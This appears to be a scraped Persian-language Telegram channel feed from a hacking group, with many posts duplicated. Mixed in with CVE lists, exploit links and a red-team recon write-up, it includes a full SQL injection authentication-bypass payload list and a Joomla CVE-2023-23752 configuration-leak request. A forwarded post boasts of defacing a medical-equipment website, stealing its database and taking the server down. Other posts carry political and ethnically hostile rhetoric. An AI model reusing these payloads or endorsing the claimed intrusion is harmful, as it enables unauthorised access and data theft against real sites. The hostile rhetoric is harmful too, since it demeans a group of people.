Forwarded from Private Shizo
CVE-2023-0179-PoC_Infoleak_LPE.zip
13.6 KB
CVE برای اپل:
CVE-2022-22587 (IOMobileFrameBuffer)
- یک برنامه مخرب ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند.
CVE-2022-22594 (WebKit Storage)
- یک وب سایت ممکن است بتواند اطلاعات حساس کاربر را ردیابی کند (که عموماً شناخته شده است اما به طور فعال مورد exploited قرار نمی گیرد)
CVE-2022-22620 (WebKit)
- پردازش محتوای وب ساخته شده به طور مخرب ممکن است منجر به اجرای کد دلخواه شود
CVE-2022-22674 (درایور گرافیک اینتل)
- یک برنامه ممکن است بتواند حافظه کرنل را بخواند
CVE-2022-22675 (AppleAVD)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند.
CVE-2022-32893 (WebKit)
- پردازش محتوای وب ساخته شده به طور مخرب ممکن است منجر به اجرای کد دلخواه شود
CVE-2022-32894 (کرنل)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند.
CVE-2022-32917 (کرنل)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند
CVE-2022-42827 (کرنل)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های اجرا کند
#CVE
@PfkSecurity
CVE-2022-22587 (IOMobileFrameBuffer)
- یک برنامه مخرب ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند.
CVE-2022-22594 (WebKit Storage)
- یک وب سایت ممکن است بتواند اطلاعات حساس کاربر را ردیابی کند (که عموماً شناخته شده است اما به طور فعال مورد exploited قرار نمی گیرد)
CVE-2022-22620 (WebKit)
- پردازش محتوای وب ساخته شده به طور مخرب ممکن است منجر به اجرای کد دلخواه شود
CVE-2022-22674 (درایور گرافیک اینتل)
- یک برنامه ممکن است بتواند حافظه کرنل را بخواند
CVE-2022-22675 (AppleAVD)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند.
CVE-2022-32893 (WebKit)
- پردازش محتوای وب ساخته شده به طور مخرب ممکن است منجر به اجرای کد دلخواه شود
CVE-2022-32894 (کرنل)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند.
CVE-2022-32917 (کرنل)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های کرنل اجرا کند
CVE-2022-42827 (کرنل)
- یک برنامه ممکن است بتواند کد دلخواه را با دسترسی های اجرا کند
#CVE
@PfkSecurity
DirtyCred-Zhenpeng.pdf
14.3 MB
2022-LPE-UAF
محققان امنیتی 3 آسیبپذیری را در کرنل لینوکس کشف کردند که به مهاجم محلی ( local ) اجازه میدهد دسترسی ها را افزایش دهد و به طور بالقوه کدهای مخرب را اجرا کند. کد اثبات مفهوم ( PoC )در دسترس عموم است و احتمال بهره برداری( exploitation ) در wild را افزایش می دهد.
https://github.com/greek0x0/2022-LPE-UAF
#privilege #vulnerability
@pfksecurity
محققان امنیتی 3 آسیبپذیری را در کرنل لینوکس کشف کردند که به مهاجم محلی ( local ) اجازه میدهد دسترسی ها را افزایش دهد و به طور بالقوه کدهای مخرب را اجرا کند. کد اثبات مفهوم ( PoC )در دسترس عموم است و احتمال بهره برداری( exploitation ) در wild را افزایش می دهد.
https://github.com/greek0x0/2022-LPE-UAF
#privilege #vulnerability
@pfksecurity
5 افزونه مفید برای موزیلا فایرفاکس
1. Cookie-Editor
- به شما امکان ایجاد، ویرایش و حذف کوکی ها برای هر صفحه را می دهد.
2. Proxy SwitchyOmega
- به شما امکان مدیریت و جابجایی بین بسیاری از پروکسی ها را می دهد.
3. Firefox Translations
- کل صفحه را به زبان مورد نیاز شما ترجمه می کند.
4. دسترسی به Rutreker
- به شما امکان می دهد بدون VPN / proxy / Tor به ردیاب تورنت افسانه ای دسترسی پیدا کنید.
5. Clear Browing Data
- تاریخچه، کوکی ها و کش را با یک کلیک پاک می کند.
#حریم_خصوصی
@PfkSecurity
1. Cookie-Editor
- به شما امکان ایجاد، ویرایش و حذف کوکی ها برای هر صفحه را می دهد.
2. Proxy SwitchyOmega
- به شما امکان مدیریت و جابجایی بین بسیاری از پروکسی ها را می دهد.
3. Firefox Translations
- کل صفحه را به زبان مورد نیاز شما ترجمه می کند.
4. دسترسی به Rutreker
- به شما امکان می دهد بدون VPN / proxy / Tor به ردیاب تورنت افسانه ای دسترسی پیدا کنید.
5. Clear Browing Data
- تاریخچه، کوکی ها و کش را با یک کلیک پاک می کند.
#حریم_خصوصی
@PfkSecurity
addons.mozilla.org
Cookie-Editor – Загрузите это расширение для 🦊 Firefox (ru)
Скачать «Cookie-Editor» для Firefox. Cookie-Editor lets you efficiently create, edit and delete a cookie for the current tab. Perfect for developing, quickly testing or even manually managing your cookies for your privacy.
Bypass-AV.png
2 MB
BypassAV.
این نقشه تکنیک های ضروری برای دور زدن آنتی ویروس و EDR را فهرست می کند.
https://github.com/CMEPW/BypassAV
#AV #Bypass #EDR
@Pfksecurity
این نقشه تکنیک های ضروری برای دور زدن آنتی ویروس و EDR را فهرست می کند.
https://github.com/CMEPW/BypassAV
#AV #Bypass #EDR
@Pfksecurity
Media is too big
VIEW IN TELEGRAM
هک با ChatGPT
- امنیت سایبری اتوماسیون Bash Script
- حل چالش CTF با ChatGPT
#ChatGPT #CTF #Hack
@pfksecurity
- امنیت سایبری اتوماسیون Bash Script
- حل چالش CTF با ChatGPT
#ChatGPT #CTF #Hack
@pfksecurity
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2022-34689
Windows CryptoAPI spoofing vulnerability.
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689
@pfksecurity
Windows CryptoAPI spoofing vulnerability.
https://github.com/akamai/akamai-security-research/tree/main/PoCs/CVE-2022-34689
@pfksecurity
SQL Injection
آسیب پذیری SQL Injectionدر سیستم مدیریت پروژه R&D ZenTao
https://github.com/spmonkey/zentao_sql_poc
#SqlInjection
@PfkSecurity
آسیب پذیری SQL Injectionدر سیستم مدیریت پروژه R&D ZenTao
https://github.com/spmonkey/zentao_sql_poc
#SqlInjection
@PfkSecurity
GitHub
GitHub - spmonkey/zentao_sql_poc: 禅道研发项⽬管理系统sql注入漏洞
禅道研发项⽬管理系统sql注入漏洞. Contribute to spmonkey/zentao_sql_poc development by creating an account on GitHub.
چگونه یک شرکت را هک کردم (اولین تعامل تیم قرمز من 🚩 )
درود دوستان! اخیراً با اولین همکاری تیم قرمز خود مواجه شدم. مشتری این تعامل یک شرکت بزرگ فین تک با شبکه گسترده ای بود. رویکرد تعامل، انجام یک شبیهسازی دشمن با سناریوی نقض فرض کنید. این پست صرفاً روش تعاملی را که من به تنهایی دنبال میکنم توصیف میکند و ممکن است با دیدگاه سایر تیمهای قرمز متفاوت باشد.
شرکت مورد نظر دامنه های زیادی در اینترنت داشت و برنامه های مختلفی را برای کارمندان و مشتریان خود میزبانی می کرد. هر بخش از اطلاعات وب سایت برای یک تیم قرمز مهم است. پنتست برنامه وب نقش مهمی در هنگام انجام یک تعامل تیم قرمز بازی میکند. پس از جمع آوری اطلاعات از طریق اینترنت عمومی، با دامنه های مختلف دیگری که توسط شرکت استفاده می شود آشنا شدیم. برخی از تاکتیک های مهم شمارش که قبل از شروع به بررسی مستقیم شبکه داخلی شرکت باید انجام شود عبارتند از:
Subdomain Enumeration
GitHub Dorking
Shodan Dorking
Google Dorking
پنتست برنامه خارجی
آشنایی با معماری سازمانی
ما میتوانیم برنامههای مختلف (چه خارجی و چه داخلی) مورد استفاده توسط شرکت را با انجام شمارش گسترده زیر دامنه فهرست کنیم. مقیاس دامنه هدف فقط به طور تصادفی بر اساس سازمان در حین انجام شمارش دامنه فرعی گسترش می یابد.
برای شمارش دامنههای فرعی، من شخصاً از subfinder استفاده میکنم که با بسیاری از کلیدهای API یکپارچه شده است. همیشه خوب است که زیر دامنه ها را بررسی کنید، خواه از اینترنت عمومی در دسترس هستند یا خیر.
در اینجا زیر دامنه های زیادی را پیدا کردم که نام آنها برای برنامه های وب داخلی است که از اینترنت عمومی قابل دسترسی نیستند. اما اکثر آنها در دسترس هستند. بنابراین، زمان آن رسیده که این برنامه ها را بررسی کنید.
آزمایش این برنامهها کار خستهکنندهای بود، بیشتر آنها برنامههایی ثابت برای اهداف بازاریابی تجاری بودند. هرچه این ویژگی پویاتر باشد، برای ما جالب تر می شود. تیم ما آسیبپذیریهای برنامههای وب بسیاری را در گستره وسیع هدف پیدا کرده بود. من شخصاً دوست دارم برای SQL Injection، XML External Entity و Open Redirection برای تعاملات تیم قرمز آزمایش کنم. ممکن است فکر کنید، "چرا به طور خاص این اشکالات؟"
خوب، دلیل خوبی برای یافتن این اشکالات وجود دارد زیرا SQL Injection و XML External Entity حملاتی مبتنی بر تزریق هستند که به مهاجم کمک میکنند اطلاعات حساس را از Backend/Server، که دادههای بلادرنگی است که توسط شرکت استفاده میشود، بازیابی کند. این می تواند بیشتر برای حرکت جانبی در مرحله بعدی استفاده شود. و در دنیای امروز InfoSec، تغییر مسیر باز ممکن است به عنوان یک باگ معمولی تلقی شود، جایی که شکارچیان آن را عادی کردهاند. اما Red Teamers ارزش آن را میدانند، زیرا میتوان از آن برای جذب قربانی از شرکت استفاده کرد. قربانیان به راحتی فریب این توهم را می خورند زیرا هدایت مجدد به URL مخرب ما از نام دامنه سازمانی آنها انجام می شود. بیشتر کارمندان غیر فنی در یک شرکت از این روش استفاده می کنند. آسیبپذیریهای شناختهشده زیادی در طبیعت وجود دارد، اما این آسیبپذیریهای موردعلاقه من برای جستجو هستند، که میتوان به راحتی از آنها برای تعامل بیشتر استفاده کرد.
قسمت اول
@pfkSecurity
درود دوستان! اخیراً با اولین همکاری تیم قرمز خود مواجه شدم. مشتری این تعامل یک شرکت بزرگ فین تک با شبکه گسترده ای بود. رویکرد تعامل، انجام یک شبیهسازی دشمن با سناریوی نقض فرض کنید. این پست صرفاً روش تعاملی را که من به تنهایی دنبال میکنم توصیف میکند و ممکن است با دیدگاه سایر تیمهای قرمز متفاوت باشد.
شرکت مورد نظر دامنه های زیادی در اینترنت داشت و برنامه های مختلفی را برای کارمندان و مشتریان خود میزبانی می کرد. هر بخش از اطلاعات وب سایت برای یک تیم قرمز مهم است. پنتست برنامه وب نقش مهمی در هنگام انجام یک تعامل تیم قرمز بازی میکند. پس از جمع آوری اطلاعات از طریق اینترنت عمومی، با دامنه های مختلف دیگری که توسط شرکت استفاده می شود آشنا شدیم. برخی از تاکتیک های مهم شمارش که قبل از شروع به بررسی مستقیم شبکه داخلی شرکت باید انجام شود عبارتند از:
Subdomain Enumeration
GitHub Dorking
Shodan Dorking
Google Dorking
پنتست برنامه خارجی
آشنایی با معماری سازمانی
ما میتوانیم برنامههای مختلف (چه خارجی و چه داخلی) مورد استفاده توسط شرکت را با انجام شمارش گسترده زیر دامنه فهرست کنیم. مقیاس دامنه هدف فقط به طور تصادفی بر اساس سازمان در حین انجام شمارش دامنه فرعی گسترش می یابد.
cat targetDomains.txt | while read -r domain; do ( echo $domain | subfinder -silent >>subdomains.txt ); doneبرای شمارش دامنههای فرعی، من شخصاً از subfinder استفاده میکنم که با بسیاری از کلیدهای API یکپارچه شده است. همیشه خوب است که زیر دامنه ها را بررسی کنید، خواه از اینترنت عمومی در دسترس هستند یا خیر.
httpx کار را برای من انجام میدهد.cat subdomains.txt | httpx -silent -scدر اینجا زیر دامنه های زیادی را پیدا کردم که نام آنها برای برنامه های وب داخلی است که از اینترنت عمومی قابل دسترسی نیستند. اما اکثر آنها در دسترس هستند. بنابراین، زمان آن رسیده که این برنامه ها را بررسی کنید.
آزمایش این برنامهها کار خستهکنندهای بود، بیشتر آنها برنامههایی ثابت برای اهداف بازاریابی تجاری بودند. هرچه این ویژگی پویاتر باشد، برای ما جالب تر می شود. تیم ما آسیبپذیریهای برنامههای وب بسیاری را در گستره وسیع هدف پیدا کرده بود. من شخصاً دوست دارم برای SQL Injection، XML External Entity و Open Redirection برای تعاملات تیم قرمز آزمایش کنم. ممکن است فکر کنید، "چرا به طور خاص این اشکالات؟"
خوب، دلیل خوبی برای یافتن این اشکالات وجود دارد زیرا SQL Injection و XML External Entity حملاتی مبتنی بر تزریق هستند که به مهاجم کمک میکنند اطلاعات حساس را از Backend/Server، که دادههای بلادرنگی است که توسط شرکت استفاده میشود، بازیابی کند. این می تواند بیشتر برای حرکت جانبی در مرحله بعدی استفاده شود. و در دنیای امروز InfoSec، تغییر مسیر باز ممکن است به عنوان یک باگ معمولی تلقی شود، جایی که شکارچیان آن را عادی کردهاند. اما Red Teamers ارزش آن را میدانند، زیرا میتوان از آن برای جذب قربانی از شرکت استفاده کرد. قربانیان به راحتی فریب این توهم را می خورند زیرا هدایت مجدد به URL مخرب ما از نام دامنه سازمانی آنها انجام می شود. بیشتر کارمندان غیر فنی در یک شرکت از این روش استفاده می کنند. آسیبپذیریهای شناختهشده زیادی در طبیعت وجود دارد، اما این آسیبپذیریهای موردعلاقه من برای جستجو هستند، که میتوان به راحتی از آنها برای تعامل بیشتر استفاده کرد.
قسمت اول
@pfkSecurity
تو اینروزا که داریم تو سر و کله هم میزنیم
مجاهدین لایحه بردن کنگره واسه جمهوری دموکراتیک ایران و مریم رجوی رو هم بعنوان رهبر اپوزیسیون معرفی کردن .
دشمن ایران کیه ؟
مجاهد ، جمهوری اسلامی ، تجزیه طلب
وسلام
برید ایمیل بزنید 👇
https://www.congress.gov/bill/117th-congress/house-resolution/118/cosponsors?r=21&s=1&utm_source=clubhouse
@pfksecurity
مجاهدین لایحه بردن کنگره واسه جمهوری دموکراتیک ایران و مریم رجوی رو هم بعنوان رهبر اپوزیسیون معرفی کردن .
دشمن ایران کیه ؟
مجاهد ، جمهوری اسلامی ، تجزیه طلب
وسلام
برید ایمیل بزنید 👇
https://www.congress.gov/bill/117th-congress/house-resolution/118/cosponsors?r=21&s=1&utm_source=clubhouse
@pfksecurity
VPS-web-hacking-tools
Automatically install some web hacking/bug bounty tools for your VPS.
https://github.com/supr4s/VPS-web-hacking-tools
#VPS #hack
@PfkSecurity
Automatically install some web hacking/bug bounty tools for your VPS.
https://github.com/supr4s/VPS-web-hacking-tools
#VPS #hack
@PfkSecurity
GitHub
GitHub - supr4s/WebHackingTools: Automatically install some web hacking/bug bounty tools.
Automatically install some web hacking/bug bounty tools. - supr4s/WebHackingTools
Forwarded from تیم سایبری | Black Wolves
🔴Once again we hacked your server, yes we are!
Website : meymed.com
By infiltrating the country's medical equipment site again, we defaced the site and invited people to the call on 27th of Bahman, and obtained the database again.
We still took the server out of reach due to security issues!
We don't forgive, we don't forget...
Wait for us, we will come again...
Thanks to the pkfsecurity team for our cooperation.
🔴 بار دیگر سرور شما را هک کردیم ، بله ما هستیم !
سایت : meymed.com
با نفوذ دوباره به سايت تجهیزات پزشکی کشور سایت را دیفیس و مردم را به فراخوان ۲۷ بهمن دعوت کردیم ، و دیتابیس را بار دیگر به دست آوردیم .
همچنان به دلیل مسائل امنیتی سرور را از دسترس خارج کردیم !
نمیبخشیم ، فراموش نمیکنیم ...
منتظر ما باشید ، باز هم میایم ...
با تشکر از تیم pkfsecurity در همکاری ما .
⚫
Website : meymed.com
By infiltrating the country's medical equipment site again, we defaced the site and invited people to the call on 27th of Bahman, and obtained the database again.
We still took the server out of reach due to security issues!
We don't forgive, we don't forget...
Wait for us, we will come again...
Thanks to the pkfsecurity team for our cooperation.
🔴 بار دیگر سرور شما را هک کردیم ، بله ما هستیم !
سایت : meymed.com
با نفوذ دوباره به سايت تجهیزات پزشکی کشور سایت را دیفیس و مردم را به فراخوان ۲۷ بهمن دعوت کردیم ، و دیتابیس را بار دیگر به دست آوردیم .
همچنان به دلیل مسائل امنیتی سرور را از دسترس خارج کردیم !
نمیبخشیم ، فراموش نمیکنیم ...
منتظر ما باشید ، باز هم میایم ...
با تشکر از تیم pkfsecurity در همکاری ما .
⚫
BLACK WOLVES TEAM ⚫۲۵ بهمن ماه سالگشت جنگ #نهاوند
جنگی که چیرگی بر شکوه و بزرگی، جشنها، شادمانیها، راستیها، درستیها، نیکیها، ارزشها و منش ایرانی انسانی بود و آغاز فرومایگی، واپسگرایی، خرافات، یاوهها، خردباختگی، خودباختگی خودفروشی، دروغ، نیرنگ، خواری، پستی، بیاعتباری و بیارزشی و...
٢۵بهمن ماه سالگشت جنگ نهاوند روز به سوگ نشستن است. روز نسلکشی ایرانیان بدست اعراب مسلمان که کشتارها بسیار فراوان کردند. چپاولها و غارتها کردند، ویرانیها کردند و سوزاندند. مردان و پسران ایرانی را به اسارت گرفتند و نوکری گماشتند. دختران و زنان ایرانی را به بند کشیدن و به بردهگی بردن و آنان را در بازار مدینه و مکه به فروش رساندند.
آری ١٣۸۲سال پیش در چنین روزی ایرانیان نیک سرشت در جنگ نهاوند از اعراب مسلمان عربستان اهریمن شکست خوردند تا که #فرهنگ_ناب، #تمدن_بزرگ، #تاریخ_کهن و #آیین نیک نیاکان ایرانیمان گرفتار شود. درود بر زنان و مردان ایرانی که در برابر تازیان مسلمان از همان زمان تاکنون تا پای جان ایستادند و جانفشانی کردند.
یاد و نامشان جاودان 🥀
#نهاوند #قادسیه #واجرود #جلولا #سیستان #تبرستان
@PfkSecurity
جنگی که چیرگی بر شکوه و بزرگی، جشنها، شادمانیها، راستیها، درستیها، نیکیها، ارزشها و منش ایرانی انسانی بود و آغاز فرومایگی، واپسگرایی، خرافات، یاوهها، خردباختگی، خودباختگی خودفروشی، دروغ، نیرنگ، خواری، پستی، بیاعتباری و بیارزشی و...
٢۵بهمن ماه سالگشت جنگ نهاوند روز به سوگ نشستن است. روز نسلکشی ایرانیان بدست اعراب مسلمان که کشتارها بسیار فراوان کردند. چپاولها و غارتها کردند، ویرانیها کردند و سوزاندند. مردان و پسران ایرانی را به اسارت گرفتند و نوکری گماشتند. دختران و زنان ایرانی را به بند کشیدن و به بردهگی بردن و آنان را در بازار مدینه و مکه به فروش رساندند.
آری ١٣۸۲سال پیش در چنین روزی ایرانیان نیک سرشت در جنگ نهاوند از اعراب مسلمان عربستان اهریمن شکست خوردند تا که #فرهنگ_ناب، #تمدن_بزرگ، #تاریخ_کهن و #آیین نیک نیاکان ایرانیمان گرفتار شود. درود بر زنان و مردان ایرانی که در برابر تازیان مسلمان از همان زمان تاکنون تا پای جان ایستادند و جانفشانی کردند.
یاد و نامشان جاودان 🥀
#نهاوند #قادسیه #واجرود #جلولا #سیستان #تبرستان
@PfkSecurity
SQL injection auth bypass list
@PfkSecurity
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
#sqli #SqlInjection@PfkSecurity
CVE-2023-23752
Joomla webservice endpoint access
PoC
#cve
@pfksecurity
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'#cve
@pfksecurity